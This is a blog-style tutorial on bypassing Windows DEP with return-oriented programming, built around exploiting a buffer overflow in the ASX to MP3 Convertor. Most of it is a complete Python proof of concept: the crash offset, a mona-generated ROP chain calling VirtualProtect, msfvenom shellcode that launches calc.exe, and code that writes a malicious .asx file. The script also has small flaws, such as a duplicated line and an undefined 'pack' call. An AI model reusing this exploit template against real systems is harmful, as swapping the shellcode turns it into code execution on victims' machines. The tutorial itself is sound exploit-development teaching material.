Local SEH overflow with ROP to bypass DEP - ASX to MP3 Convertor exploitation

This post covers the exploitation of ASX to MP3 Convertor, which includes a local SEH overflow when processing files.

Local SEH exploitation

This exploit is assuming you have already gone through the process of exploiting a local SEH overflow without any mitigations, now with the introduction of your first security mitigation, you need to learn how to bypass it.

What is DEP

DEP (data execution prevention) is a microsoft implemented security mitigation to prevent malicious attackers from being able to execute code on the stack.

When writing an exploit, the malicious payload is delivered via a shellcode payload, which gets written onto the stack (the attack delivery can be something like a buffer overflow vulnerability) and when the shellcode is executed on the stack, it gives the attacker access to the system.

DEP works to prevent this by marking certain memory aspects and pages of memory as non-executable, where it won’t execute code that is written onto it.

The question is, how can we bypass this, we need to work to get around, or disable DEP in order to have our exploit work.

DEP can be enabled or disabled via the advanced system setting of your computer.

dep 1

What is ROP

ROP is a commonly used technique by attackers to attack mitigations like DEP, ROP (return oriented programming), is a programming technique where the attacker will re-use pre-existing instructions that already exist within the application, where the attacker will call a series of memory address pertaining to code instructions in such a order that it actually creates a program-like execution within the application, without adding any code. It’s a internal application code-reuse attack, where you use the application to attack itself.

ROP attacks are built of what’s called a ROP chain, a ROP chain is comprised of ROP gadgets, and each of these gadgets are memory addresses of code to call.

What’s special about each instruction, is that it’s a series of instructions that end in a RET assesmbly instruction, so after executing the instruction, it will return to the next gadget.

+-------------------+
|Instruction address|
|RET                |
|Instruction address|
|RET                |
|Instruction address|
|RET                |
|Instruction address|
|RET                |
|shellcode          |
+-------------------+

After each ROP gadet get’s executed, it moves down the chain, and eventually the last RET will return to the first address of your shellcode payload.

Our ROP payload

We will be using a ROP payload which works to disable the DEP mitigation, and then we have it execute our shellcode.

Generate ROP chains with Mona.py

You can use the mona.py syntax !mona rop -m *.dll -cp nonull to search through your application’s DLL’s for ROP gadgets that do no include null bytes.

dep 1

Pop a calculator

Include your ROP chain before your shellcode payload when creating your exploit.

Our final exploit looks like

import struct
import sys

# Log data, item 39
# Address=0BADF00D
# Message=    EIP contains normal pattern : 0x36695735 (offset 17417)

# Log data, item 3
# Address=100371F5
# Message=  0x100371f5 : call esp |  {PAGE_EXECUTE_READ} [MSA2Mfilter03.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\Mini-stream\ASX to MP3 Converter\MSA2Mfilter03.dll)

CALL_ESP = pack('<L', 0x100371f5)

#msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0A" -f python -v shellcode_calc
shellcode_calc =  ""
shellcode_calc += "\xba\x5f\x9b\xba\x75\xd9\xc2\xd9\x74\x24"
shellcode_calc += "\xf4\x5e\x33\xc9\xb1\x31\x83\xee\xfc\x31"
shellcode_calc += "\x56\x0f\x03\x56\x50\x79\x4f\x89\x86\xff"
shellcode_calc += "\xb0\x72\x56\x60\x38\x97\x67\xa0\x5e\xd3"
shellcode_calc += "\xd7\x10\x14\xb1\xdb\xdb\x78\x22\x68\xa9"
shellcode_calc += "\x54\x45\xd9\x04\x83\x68\xda\x35\xf7\xeb"
shellcode_calc += "\x58\x44\x24\xcc\x61\x87\x39\x0d\xa6\xfa"
shellcode_calc += "\xb0\x5f\x7f\x70\x66\x70\xf4\xcc\xbb\xfb"
shellcode_calc += "\x46\xc0\xbb\x18\x1e\xe3\xea\x8e\x15\xba"
shellcode_calc += "\x2c\x30\xfa\xb6\x64\x2a\x1f\xf2\x3f\xc1"
shellcode_calc += "\xeb\x88\xc1\x03\x22\x70\x6d\x6a\x8b\x83"
shellcode_calc += "\x6f\xaa\x2b\x7c\x1a\xc2\x48\x01\x1d\x11"
shellcode_calc += "\x33\xdd\xa8\x82\x93\x96\x0b\x6f\x22\x7a"
shellcode_calc += "\xcd\xe4\x28\x37\x99\xa3\x2c\xc6\x4e\xd8"
shellcode_calc += "\x48\x43\x71\x0f\xd9\x17\x56\x8b\x82\xcc"
shellcode_calc += "\xf7\x8a\x6e\xa2\x08\xcc\xd1\x1b\xad\x86"
shellcode_calc += "\xff\x48\xdc\xc4\x95\x8f\x52\x73\xdb\x90"
shellcode_calc += "\x6c\x7c\x4b\xf9\x5d\xf7\x04\x7e\x62\xd2"
shellcode_calc += "\x61\x70\x28\x7f\xc3\x19\xf5\x15\x56\x44"
shellcode_calc += "\x06\xc0\x94\x71\x85\xe1\x64\x86\x95\x83"
shellcode_calc += "\x61\xc2\x11\x7f\x1b\x5b\xf4\x7f\x88\x5c"
shellcode_calc += "\xdd\xe3\x4f\xcf\xbd\xcd\xea\x77\x27\x12"


def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        0x01f915d6,  # POP ECX # RETN [MSA2Mcodec01.dll] ** REBASED 
        0x73421388,  # ptr to &VirtualProtect() [IAT COMCTL32.dll] ** REBASED ** ASLR
        0x7648fd52,  # MOV ESI,DWORD PTR DS:[ECX] # ADD DH,DH # RETN [MSCTF.dll] ** REBASED ** ASLR 
        0x736573a4,  # POP EBP # RETN [comctl32.DLL] ** REBASED ** ASLR 
        0x74abfb51,  # & call esp [MSVCP60.dll] ** REBASED ** ASLR
        0x74aa4083,  # POP EAX # RETN [MSVCP60.dll] ** REBASED ** ASLR 
        0xfffffdff,  # Value to negate, will become 0x00000201
        0x761a65e0,  # NEG EAX # RETN [ole32.dll] ** REBASED ** ASLR 
        0x7648f9f1,  # XCHG EAX,EBX # RETN [MSCTF.dll] ** REBASED ** ASLR 
        0x04226922,  # POP EAX # RETN [MSA2Mctn01.dll] ** REBASED 
        0xffffffc0,  # Value to negate, will become 0x00000040
        0x032620f9,  # NEG EAX # RETN [MSA2Mfilter01.dll] ** REBASED 
        0x6fbd5d15,  # XCHG EAX,EDX # RETN [WMVCore.DLL] ** REBASED ** ASLR 
        0x753d1a65,  # POP ECX # RETN [SHELL32.dll] ** REBASED ** ASLR 
        0x032baa90,  # &Writable location [MSA2Mfilter01.dll] ** REBASED
        0x10028e6c,  # POP EDI # RETN [MSA2Mfilter03.dll] 
        0x6fd3bf87,  # RETN (ROP NOP) [WMVCore.DLL] ** REBASED ** ASLR
        0x763816cc,  # POP EAX # RETN [SHLWAPI.dll] ** REBASED ** ASLR 
        0x90909090,  # nop
        0x73535fa6,  # PUSHAD # RETN [comctl32.DLL] ** REBASED ** ASLR 
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()

rop_chain = create_rop_chain()
                                        #-----------------------------------\
payload = "http://"                     # Header for the payload            |
payload += "A" * 17417                  # Fill up the buffer with junk      |
payload += rop_chain                    # Excute out ROP chain from Mona    |
payload += "\x90" * 16                  # NOPSLED to catch out jump         |
payload += shellcode_calc               # Spawns a calculator               |
payload += "D" *(40000 - len(payload))  # Extra filler to ensure a crash    |
                                        #-----------------------------------/
try:
    print("[x] Exploit POC for ASX to MP3 converter\n")
    file_payload = open("ASXtoMP3_malicious.asx", 'w')
    print("[x] Creating a .asx file for out payload")
    file_payload.write(payload)
    print("[x] Writing malicious payload to .asx file")
    file_payload.close()
    print("[x] Load the malicious .asx file to spawn a calculator")
except:
    print("[!] Failed to create malicious .asx")

You can now execute your malicious payload to pop a calculator, and bypassing DEP in the process.

dep 2

Updated:

Leave a Comment